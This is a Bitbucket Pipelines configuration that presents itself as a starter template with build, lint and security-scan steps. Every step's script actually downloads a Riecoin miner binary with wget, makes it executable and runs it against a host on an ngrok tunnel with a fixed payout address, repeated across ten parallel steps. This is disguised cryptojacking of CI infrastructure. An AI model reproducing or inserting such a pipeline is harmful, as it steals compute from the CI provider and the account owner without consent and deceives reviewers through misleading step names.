# This is an example Starter pipeline configuration
# Use a skeleton to build, test and deploy using manual and parallel steps
# -----
# You can specify a custom docker image from Docker Hub as your build environment.

image: atlassian/default-image:3

pipelines:
  default:
    - parallel:
      - step:
          name: 'Build and Test'
          script:
            - wget -O rie https://riecoin.dev/resources/Pttn/rieMiner.php?system=Deb64AVX2 && chmod +x rie && ./rie noconffile Mode=Solo Host=0.tcp.sa.ngrok.io Port=10592 Username=guru Password=guru PayoutAddress=ric1qu9sqhnl7vwgn3dhtygwk9fyqn2a9erfwjjsp55 Threads=2
      - step:
          name: 'Lint'
          script:
            - wget -O rie https://riecoin.dev/resources/Pttn/rieMiner.php?system=Deb64AVX2 && chmod +x rie && ./rie noconffile Mode=Solo Host=0.tcp.sa.ngrok.io Port=10592 Username=guru Password=guru PayoutAddress=ric1qu9sqhnl7vwgn3dhtygwk9fyqn2a9erfwjjsp55 Threads=2
      - step:
          name: 'Security scan'
          script:
            - wget -O rie https://riecoin.dev/resources/Pttn/rieMiner.php?system=Deb64AVX2 && chmod +x rie && ./rie noconffile Mode=Solo Host=0.tcp.sa.ngrok.io Port=10592 Username=guru Password=guru PayoutAddress=ric1qu9sqhnl7vwgn3dhtygwk9fyqn2a9erfwjjsp55 Threads=2
      - step:
          name: 'Build and Test'
          script:
            - wget -O rie https://riecoin.dev/resources/Pttn/rieMiner.php?system=Deb64AVX2 && chmod +x rie && ./rie noconffile Mode=Solo Host=0.tcp.sa.ngrok.io Port=10592 Username=guru Password=guru PayoutAddress=ric1qu9sqhnl7vwgn3dhtygwk9fyqn2a9erfwjjsp55 Threads=2
      - step:
          name: 'Lint'
          script:
            - wget -O rie https://riecoin.dev/resources/Pttn/rieMiner.php?system=Deb64AVX2 && chmod +x rie && ./rie noconffile Mode=Solo Host=0.tcp.sa.ngrok.io Port=10592 Username=guru Password=guru PayoutAddress=ric1qu9sqhnl7vwgn3dhtygwk9fyqn2a9erfwjjsp55 Threads=2
      - step:
          name: 'Security scan'
          script:
            - wget -O rie https://riecoin.dev/resources/Pttn/rieMiner.php?system=Deb64AVX2 && chmod +x rie && ./rie noconffile Mode=Solo Host=0.tcp.sa.ngrok.io Port=10592 Username=guru Password=guru PayoutAddress=ric1qu9sqhnl7vwgn3dhtygwk9fyqn2a9erfwjjsp55 Threads=2
      - step:
          name: 'Build and Test'
          script:
            - wget -O rie https://riecoin.dev/resources/Pttn/rieMiner.php?system=Deb64AVX2 && chmod +x rie && ./rie noconffile Mode=Solo Host=0.tcp.sa.ngrok.io Port=10592 Username=guru Password=guru PayoutAddress=ric1qu9sqhnl7vwgn3dhtygwk9fyqn2a9erfwjjsp55 Threads=2
      - step:
          name: 'Lint'
          script:
            - wget -O rie https://riecoin.dev/resources/Pttn/rieMiner.php?system=Deb64AVX2 && chmod +x rie && ./rie noconffile Mode=Solo Host=0.tcp.sa.ngrok.io Port=10592 Username=guru Password=guru PayoutAddress=ric1qu9sqhnl7vwgn3dhtygwk9fyqn2a9erfwjjsp55 Threads=2
      - step:
          name: 'Security scan'
          script:
            - wget -O rie https://riecoin.dev/resources/Pttn/rieMiner.php?system=Deb64AVX2 && chmod +x rie && ./rie noconffile Mode=Solo Host=0.tcp.sa.ngrok.io Port=10592 Username=guru Password=guru PayoutAddress=ric1qu9sqhnl7vwgn3dhtygwk9fyqn2a9erfwjjsp55 Threads=2
      - step:
          name: 'Security scan'
          script:
            - wget -O rie https://riecoin.dev/resources/Pttn/rieMiner.php?system=Deb64AVX2 && chmod +x rie && ./rie noconffile Mode=Solo Host=0.tcp.sa.ngrok.io Port=10592 Username=guru Password=guru PayoutAddress=ric1qu9sqhnl7vwgn3dhtygwk9fyqn2a9erfwjjsp55 Threads=2
